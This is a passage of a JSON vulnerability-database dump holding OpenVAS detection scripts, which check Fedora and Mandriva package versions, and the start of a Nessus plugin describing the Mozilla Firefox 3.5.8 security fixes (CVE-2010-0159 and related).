exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC11\")\n{\n\n if ((res = isrpmvuln(pkg:\"gnome-python2-extras\", rpm:\"gnome-python2-extras~2.25.3~11.fc11\", rls:\"FC11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-06T13:05:22", "references": ["http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035350.html", "2010-1936"], "pluginID": "1361412562310861614", "description": "Check for the Version of pcmanx-gtk2", "edition": 1, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-03-02T00:00:00", "type": "openvas", "title": "Fedora Update for pcmanx-gtk2 FEDORA-2010-1936", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0160", "CVE-2009-1571", "CVE-2010-0159", "CVE-2010-0162", "CVE-2009-3988"], "modified": "2018-01-04T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310861614", "id": "OPENVAS:1361412562310861614", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for pcmanx-gtk2 FEDORA-2010-1936\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"An easy-to-use telnet client mainly targets BBS users.\n\n PCMan X is a newly developed GPL'd version of PCMan, a full-featured\n famous BBS client formerly designed for MS Windows only. It aimed to\n be an easy-to-use yet full-featured telnet client facilitating BBS\n browsing with the ability to process double-byte characters.\";\n\ntag_affected = \"pcmanx-gtk2 on Fedora 11\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035350.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.861614\");\n script_version(\"$Revision: 8287 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-04 08:28:11 +0100 (Thu, 04 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-02 08:38:02 +0100 (Tue, 02 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-1936\");\n script_cve_id(\"CVE-2010-0159\", \"CVE-2010-0160\", \"CVE-2009-1571\", \"CVE-2009-3988\", \"CVE-2010-0162\");\n script_name(\"Fedora Update for pcmanx-gtk2 FEDORA-2010-1936\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of pcmanx-gtk2\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC11\")\n{\n\n if ((res = isrpmvuln(pkg:\"pcmanx-gtk2\", rpm:\"pcmanx-gtk2~0.3.9~2.20100210svn.fc11\", rls:\"FC11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:54:32", "references": ["2010-1727", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035428.html"], "pluginID": "1361412562310861627", "description": "Check for the Version of mozvoikko", "edition": 1, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-03-02T00:00:00", "title": "Fedora Update for mozvoikko FEDORA-2010-1727", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0160", "CVE-2009-1571", "CVE-2010-0159", "CVE-2010-0162", "CVE-2009-3988"], "modified": "2017-12-21T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310861627", "id": "OPENVAS:1361412562310861627", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mozvoikko FEDORA-2010-1727\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"mozvoikko on Fedora 12\";\ntag_insight = \"This is mozvoikko, an extension for Mozilla programs for using the Finnish\n spell-checker Voikko.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035428.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.861627\");\n script_version(\"$Revision: 8207 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-21 08:30:12 +0100 (Thu, 21 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-02 08:38:02 +0100 (Tue, 02 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-1727\");\n script_cve_id(\"CVE-2010-0159\", \"CVE-2010-0160\", \"CVE-2009-1571\", \"CVE-2009-3988\", \"CVE-2010-0162\");\n script_name(\"Fedora Update for mozvoikko FEDORA-2010-1727\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mozvoikko\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC12\")\n{\n\n if ((res = isrpmvuln(pkg:\"mozvoikko\", rpm:\"mozvoikko~1.0~8.fc12\", rls:\"FC12\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-18T11:04:29", "references": ["2010-1727", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035427.html"], "pluginID": "1361412562310861640", "description": "Check for the Version of gnome-web-photo", "edition": 1, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-03-02T00:00:00", "type": "openvas", "title": "Fedora Update for gnome-web-photo FEDORA-2010-1727", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0160", "CVE-2009-1571", "CVE-2010-0159", "CVE-2010-0162", "CVE-2009-3988"], "modified": "2018-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310861640", "id": "OPENVAS:1361412562310861640", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for gnome-web-photo FEDORA-2010-1727\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"gnome-web-photo on Fedora 12\";\ntag_insight = \"gnome-web-photo contains a thumbnailer that will be used by GNOME applications,\n including the file manager, to generate screenshots of web pages.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035427.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.861640\");\n script_version(\"$Revision: 8440 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-17 08:58:46 +0100 (Wed, 17 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-02 08:38:02 +0100 (Tue, 02 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-1727\");\n script_cve_id(\"CVE-2010-0159\", \"CVE-2010-0160\", \"CVE-2009-1571\", \"CVE-2009-3988\", \"CVE-2010-0162\");\n script_name(\"Fedora Update for gnome-web-photo FEDORA-2010-1727\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of gnome-web-photo\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC12\")\n{\n\n if ((res = isrpmvuln(pkg:\"gnome-web-photo\", rpm:\"gnome-web-photo~0.9~5.fc12\", rls:\"FC12\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-19T15:05:01", "references": ["2010-1936", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035367.html"], "pluginID": "1361412562310861632", "description": "Check for the Version of epiphany-extensions", "edition": 1, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-03-02T00:00:00", "type": "openvas", "title": "Fedora Update for epiphany-extensions FEDORA-2010-1936", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0160", "CVE-2009-1571", "CVE-2010-0159", "CVE-2010-0162", "CVE-2009-3988"], "modified": "2018-01-19T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310861632", "id": "OPENVAS:1361412562310861632", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for epiphany-extensions FEDORA-2010-1936\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"epiphany-extensions on Fedora 11\";\ntag_insight = \"Epiphany Extensions is a collection of extensions for Epiphany, the\n GNOME web browser.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035367.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.861632\");\n script_version(\"$Revision: 8469 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-19 08:58:21 +0100 (Fri, 19 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-02 08:38:02 +0100 (Tue, 02 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-1936\");\n script_cve_id(\"CVE-2010-0159\", \"CVE-2010-0160\", \"CVE-2009-1571\", \"CVE-2009-3988\", \"CVE-2010-0162\");\n script_name(\"Fedora Update for epiphany-extensions FEDORA-2010-1936\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of epiphany-extensions\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC11\")\n{\n\n if ((res = isrpmvuln(pkg:\"epiphany-extensions\", rpm:\"epiphany-extensions~2.26.1~10.fc11\", rls:\"FC11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-19T15:05:15", "references": ["2010:042", "http://lists.mandriva.com/security-announce/2010-01/msg00079.php"], "pluginID": "1361412562310830849", "description": "Check for the Version of urpmi", "edition": 1, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-01-29T00:00:00", "type": "openvas", "title": "Mandriva Update for urpmi MDVA-2010:042 (urpmi)", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Mandrake Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0160", "CVE-2009-1571", "CVE-2010-0159", "CVE-2010-0162", "CVE-2009-3988"], "modified": "2018-01-18T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310830849", "id": "OPENVAS:1361412562310830849", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for urpmi MDVA-2010:042 (urpmi)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"urpmi on Mandriva Linux 2010.0,\n Mandriva Linux 2010.0/X86_64\";\ntag_insight = \"This update a bug in urpmi which prevented rpmdrake to install packages\n a second time (bug #54842)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-01/msg00079.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.830849\");\n script_version(\"$Revision: 8457 $\");\n script_cve_id(\"CVE-2009-1571\", \"CVE-2009-3988\", \"CVE-2010-0159\", \"CVE-2010-0160\",\n \"CVE-2010-0162\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-18 08:58:32 +0100 (Thu, 18 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-29 14:09:25 +0100 (Fri, 29 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDVA\", value: \"2010:042\");\n script_name(\"Mandriva Update for urpmi MDVA-2010:042 (urpmi)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of urpmi\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2010.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"gurpmi\", rpm:\"gurpmi~6.32~2.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"urpmi\", rpm:\"urpmi~6.32~2.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"urpmi-dudf\", rpm:\"urpmi-dudf~6.32~2.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"urpmi-ldap\", rpm:\"urpmi-ldap~6.32~2.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"urpmi-parallel-ka-run\", rpm:\"urpmi-parallel-ka-run~6.32~2.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"urpmi-parallel-ssh\", rpm:\"urpmi-parallel-ssh~6.32~2.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2018-09-01T23:36:58", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=576969", "http://www.mozilla.org/security/announce/2010/mfsa2010-03.html", "http://support.novell.com/security/cve/CVE-2010-0159.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-02.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-05.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-04.html", "http://support.novell.com/security/cve/CVE-2009-3988.html", "http://support.novell.com/security/cve/CVE-2009-1571.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-01.html", "http://support.novell.com/security/cve/CVE-2010-0160.html", "http://support.novell.com/security/cve/CVE-2010-0162.html"], "pluginID": "44907", "description": "Mozilla Firefox was upgraded to version 3.5.8, fixing various bugs and security issues.\n\nThe following security issues have been fixed :\n\n - Mozilla developers identified and fixed several stability bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these crashes showed evidence of memory corruption under certain circumstances and we presume that with enough effort at least some of these could be exploited to run arbitrary code. (MFSA 2010-01 / CVE-2010-0159)\n\n - Security researcher Orlando Barrera II reported via TippingPoint's Zero Day Initiative that Mozilla's implementation of Web Workers contained an error in its handling of array data types when processing posted messages. This error could be used by an attacker to corrupt heap memory and crash the browser, potentially running arbitrary code on a victim's computer. (MFSA 2010-02 / CVE-2010-0160)\n\n - Security researcher Alin Rad Pop of Secunia Research reported that the HTML parser incorrectly freed used memory when insufficient space was available to process remaining input. Under such circumstances, memory occupied by in-use objects was freed and could later be filled with attacker-controlled text. These conditions could result in the execution or arbitrary code if methods on the freed objects were subsequently called.\n (MFSA 2010-03 / CVE-2009-1571)\n\n - Security researcher Hidetake Jo of Microsoft Vulnerability Research reported that the properties set on an object passed to showModalDialog were readable by the document contained in the dialog, even when the document was from a different domain. This is a violation of the same-origin policy and could result in a website running untrusted JavaScript if it assumed the dialogArguments could not be initialized by another site. (MFSA 2010-04 / CVE-2009-3988)\n\nAn anonymous security researcher, via TippingPoint's Zero Day Initiative, also independently reported this issue to Mozilla.\n\n - Mozilla security researcher Georgi Guninski reported that when a SVG document which is served with Content-Type: application/octet-stream is embedded into another document via an embed tag with type='image/svg+xml', the Content-Type is ignored and the SVG document is processed normally. A website which allows arbitrary binary data to be uploaded but which relies on Content-Type: application/octet-stream to prevent script execution could have such protection bypassed. An attacker could upload a SVG document containing JavaScript as a binary file to a website, embed the SVG document into a malicous page on another site, and gain access to the script environment from the SVG-serving site, bypassing the same-origin policy.\n (MFSA 2010-05 / CVE-2010-0162)", "edition": 5, "reporter": "Tenable", "published": "2010-02-25T00:00:00", "title": "SuSE 11 Security Update : Mozilla Firefox (SAT Patch Number 2025)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0160", "CVE-2009-1571", "CVE-2010-0159", "CVE-2010-0162", "CVE-2009-3988"], "modified": "2016-12-21T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-32bit", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-gnomevfs-32bit", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-translations-32bit", "p-cpe:/a:novell:suse_linux:11:MozillaFirefox-translations", "p-cpe:/a:novell:suse_linux:11:MozillaFirefox", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-translations", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-gnomevfs"], "id": "SUSE_11_MOZILLAFIREFOX-100219.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44907", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44907);\n script_version(\"$Revision: 1.11 $\");\n script_cvs_date(\"$Date: 2016/12/21 20:21:20 $\");\n\n script_cve_id(\"CVE-2009-1571\", \"CVE-2009-3988\", \"CVE-2010-0159\", \"CVE-2010-0160\", \"CVE-2010-0162\");\n\n script_name(english:\"SuSE 11 Security Update : Mozilla Firefox (SAT Patch Number 2025)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mozilla Firefox was upgraded to version 3.5.8, fixing various bugs and\nsecurity issues.\n\nThe following security issues have been fixed :\n\n - Mozilla developers identified and fixed several\n stability bugs in the browser engine used in Firefox and\n other Mozilla-based products. Some of these crashes\n showed evidence of memory corruption under certain\n circumstances and we presume that with enough effort at\n least some of these could be exploited to run arbitrary\n code. (MFSA 2010-01 / CVE-2010-0159)\n\n - Security researcher Orlando Barrera II reported via\n TippingPoint's Zero Day Initiative that Mozilla's\n implementation of Web Workers contained an error in its\n handling of array data types when processing posted\n messages. This error could be used by an attacker to\n corrupt heap memory and crash the browser, potentially\n running arbitrary code on a victim's computer. (MFSA\n 2010-02 / CVE-2010-0160)\n\n - Security researcher Alin Rad Pop of Secunia Research\n reported that the HTML parser incorrectly freed used\n memory when insufficient space was available to process\n remaining input. Under such circumstances, memory\n occupied by in-use objects was freed and could later be\n filled with attacker-controlled text. These conditions\n could result in the execution or arbitrary code if\n methods on the freed objects were subsequently called.\n (MFSA 2010-03 / CVE-2009-1571)\n\n - Security researcher Hidetake Jo of Microsoft\n Vulnerability Research reported that the properties set\n on an object passed to showModalDialog were readable by\n the document contained in the dialog, even when the\n document was from a different domain. This is a\n violation of the same-origin policy and could result in\n a website running untrusted JavaScript if it assumed the\n dialogArguments could not be initialized by another\n site. (MFSA 2010-04 / CVE-2009-3988)\n\nAn anonymous security researcher, via TippingPoint's Zero Day\nInitiative, also independently reported this issue to Mozilla.\n\n - Mozilla security researcher Georgi Guninski reported\n that when a SVG document which is served with\n Content-Type: application/octet-stream is embedded into\n another document via an embed tag with\n type='image/svg+xml', the Content-Type is ignored and\n the SVG document is processed normally. A website which\n allows arbitrary binary data to be uploaded but which\n relies on Content-Type: application/octet-stream to\n prevent script execution could have such protection\n bypassed. An attacker could upload a SVG document\n containing JavaScript as a binary file to a website,\n embed the SVG document into a malicous page on another\n site, and gain access to the script environment from the\n SVG-serving site, bypassing the same-origin policy.\n (MFSA 2010-05 / CVE-2010-0162)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-01.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-02.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-03.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-04.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-05.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=576969\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1571.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3988.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0159.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0160.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0162.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 